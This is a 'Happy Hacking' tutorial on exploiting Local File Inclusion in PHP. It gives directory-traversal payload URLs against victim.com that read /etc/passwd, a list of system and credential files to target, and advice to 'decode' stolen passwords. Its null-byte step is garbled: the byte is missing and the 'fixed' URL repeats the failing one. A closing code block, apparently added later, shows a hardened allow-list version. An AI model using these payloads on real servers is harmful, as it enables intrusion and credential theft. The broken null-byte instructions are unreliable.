In this article I will explain the web exploitation technique "Local File Inclusion" (LFI).
What makes a website vulnerable to LFI?
A piece of PHP code like the following makes a website vulnerable to LFI. Let's look at this code:
<?php
$page = $_GET['page'];
include($page);
?>
This code must not be used anywhere in a PHP script, because $page is not sanitized and is passed straight from the request into include(). Unfortunately this code can be found many times in many popular websites.
Now we know why and how the webpage becomes vulnerable. For the rest of the article, let's talk about using the vulnerability to our advantage.
Let us now see how this code gives us the ability to browse through the web server.
Imagine there is a file named saurav.php in the root directory of a website.
If you type
http://victim.com/root/saurav.php
You get access to that file, right?
But if the piece of PHP code above is inside index.php, then we can also reach the file using
http://victim.com/index.php?page=root/saurav.php
If index.php was at victim.com/root/index.php and saurav.php at http://victim.com/saurav.php, you would have to type http://victim.com/test/index.php?page=../saurav.php . The ../ is called directory traversal and allows you to go up in the directories.
I think you understood this one, so let's move on.
Now we can access directories and files that the server does not intend to expose. If the site is hosted on a UNIX server we can read the server's password file; we add ../ repeatedly to climb up through the directories.
Example
http://site.com/index.php?page=../../etc/passwd
http://site.com/index.php?page=../../../../../../etc/passwd
How many ../ are needed depends on which directory the passwd file is in relative to the vulnerable script.
If you don't know what to do with /etc/passwd, read the rest of the article.
/etc/passwd is where the users/passwords are stored. A non-shadowed passwd file looks like this:
username:passwd:UID:GID:full_name:directory:shell
For example:
username:SaurRavhAckingclass:503:100:FullName:/home/username:/bin/sh
All you need to do then is take the username and decode the password. If the passwd file is shadowed, you'll see something like this:
username:x:503:100:FullName:/home/username:/bin/sh
Here the password field is just "x" and the encoded password is in /etc/shadow. You will probably not have access to /etc/shadow, because it is readable/writeable only by root, whereas /etc/passwd has to be readable by many processes, which is why you can read it.
Here are some other files you can look at:
/etc/passwd
/etc/shadow
/etc/security/user
/etc/security/group
/etc/security/passwd
/etc/security/limits
/etc/security/environ
/etc/group
There is another piece of code that may make a site vulnerable to LFI:
<?php
$page = $_GET["page"];
include("$page.php");
?>
In this case, as you can see, it appends .php to anything you include. So if you type
http://victim.com/index.php?page=../../../../etc/passwd
and it shows an error like "file does not exist", you will have to apply a null byte ()
http://victim.com/index.php?page=../../../../etc/passwd
This null byte makes everything after it be ignored.
There are many other ways to exploit a website using LFI. We can use Perl scripts and many other things; I will discuss them some other day.
This article may be a little difficult for a beginner. Read it thoroughly and search Google for more on the topic.
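As an added example (not the article's own code), here is the vulnerable include from both snippets above beside a hardened version that only allows named pages and checks the resolved path; the pages/ directory and the page names are assumptions:

```php
<?php
// Added example, not from the original article. The vulnerable handler
// mirrors the article's include($page) / include("$page.php") code.

// Vulnerable: the request controls the whole include path, so values such as
// ../../etc/passwd read arbitrary files the web server user can open.
function include_vulnerable(): void
{
    $page = $_GET['page'];
    include($page);
}

// Hardened: only these page names (assumed) can ever be included.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Returns the absolute path of the page file, or null if the request is rejected.
function resolve_page(?string $page, string $baseDir): ?string
{
    // Allow-list check before touching the filesystem: "../x" or "/etc/passwd"
    // is never in the list, so traversal never reaches include().
    if ($page === null || !in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the file is still under $baseDir.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

function include_hardened(): void
{
    $full = resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
    if ($full === null) {
        http_response_code(404);
        // Log the rejected value: repeated "../" or "/etc/passwd" here is an LFI probe
        // worth alerting on. (The null-byte trick the article mentions stopped working
        // in PHP 5.3.4, which rejects paths containing NUL; the allow-list does not
        // rely on that.)
        error_log('rejected page parameter: ' . ($_GET['page'] ?? ''));
        return;
    }
    include $full;
}
```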
Happy Hacking
Credits - planet creator